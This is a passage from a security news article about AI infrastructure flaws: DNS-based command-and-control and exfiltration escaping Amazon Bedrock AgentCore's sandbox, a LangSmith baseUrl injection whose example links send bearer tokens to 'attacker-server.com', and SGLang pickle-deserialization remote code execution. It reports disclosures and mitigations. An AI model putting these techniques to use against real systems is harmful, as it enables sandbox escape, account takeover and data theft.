Cybersecurity researchers have unveiled new methods for exfiltrating sensitive data from artificial intelligence (AI) code execution environments, utilizing domain name system (DNS) queries. These findings, along with separate disclosures regarding **LangSmith** and **SGLang**, highlight the growing need for robust security measures in AI infrastructure.  ### Amazon Bedrock AgentCore Code Interpreter Vulnerability A report by **BeyondTrust**, published this week, details how **Amazon Bedrock AgentCore Code Interpreter's** sandbox mode permits outbound DNS queries, potentially enabling attackers to establish interactive shells and bypass network isolation. This issue, currently without a **CVE** identifier, has been assigned a CVSS score of 7.5 out of 10.0. **Amazon Bedrock AgentCore Code Interpreter**, launched in August 2025, is designed to allow AI agents to securely execute code within isolated sandbox environments, preventing agentic workloads from accessing external systems. According to **Kinnaird McQuade**, chief security architect at **BeyondTrust**, the fact that the service permits DNS queries despite a "no network access" configuration could allow "threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls." In a proof-of-concept attack, researchers demonstrated how a threat actor could leverage this behavior to establish a bidirectional communication channel via DNS queries and responses. This could lead to obtaining an interactive reverse shell, exfiltrating sensitive information through DNS queries (assuming the IAM role has the necessary permissions to access **AWS** resources like **S3** buckets), and executing commands. Furthermore, the DNS communication channel can be exploited to deliver additional payloads to the Code Interpreter, prompting it to poll a DNS command-and-control (C2) server for commands stored in DNS A records, execute them, and return the results via DNS subdomain queries. The researchers emphasized that misconfigured IAM roles could exacerbate the problem. An overprivileged role assigned to the service could grant it overly broad permissions to access sensitive data. "This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters," **BeyondTrust** stated. "By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter's IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure."  Following a responsible disclosure in September 2025, **Amazon** classified the behavior as intended functionality rather than a defect. They recommend using VPC mode instead of sandbox mode for complete network isolation and suggest employing a DNS firewall to filter outbound DNS traffic. **Jason Soroko**, senior fellow at **Sectigo**, advises, "To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode." He added, "Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise."  ### LangSmith Account Takeover Vulnerability In related news, **Miggo Security** disclosed a high-severity security flaw in **LangSmith** (**CVE-2026-25750**, CVSS score: 8.5) that could lead to token theft and account takeover. This issue, affecting both self-hosted and cloud deployments, was addressed in **LangSmith** version 0.12.71, released in December 2025. The vulnerability stems from a lack of validation on the baseUrl parameter, allowing for URL parameter injection. An attacker could exploit this by tricking a user into clicking a specially crafted link, leading to the theft of their bearer token, user ID, and workspace ID. Example links include: * Cloud - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com * Self-hosted - <LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com Successful exploitation could grant unauthorized access to the AI's trace history, potentially exposing internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls. **Liad Eliyahu** and **Eliana Vuijsje**, researchers at **Miggo**, stated, "A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link."  They added, "This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like 'traditional' software, AI Agents have deep access to internal data sources and third-party services." ### Unsafe Pickle Deserialization Flaws in SGLang Finally, vulnerabilities have been identified in **SGLang**, a popular open-source framework for serving large language models and multimodal AI models. Successful exploitation could lead to unsafe pickle deserialization, potentially resulting in remote code execution. These vulnerabilities, discovered by **Igor Stepansky**, an Orca security researcher, remain unpatched. The flaws are: * **CVE-2026-3059** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang's multimodal generation module. * **CVE-2026-3060** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang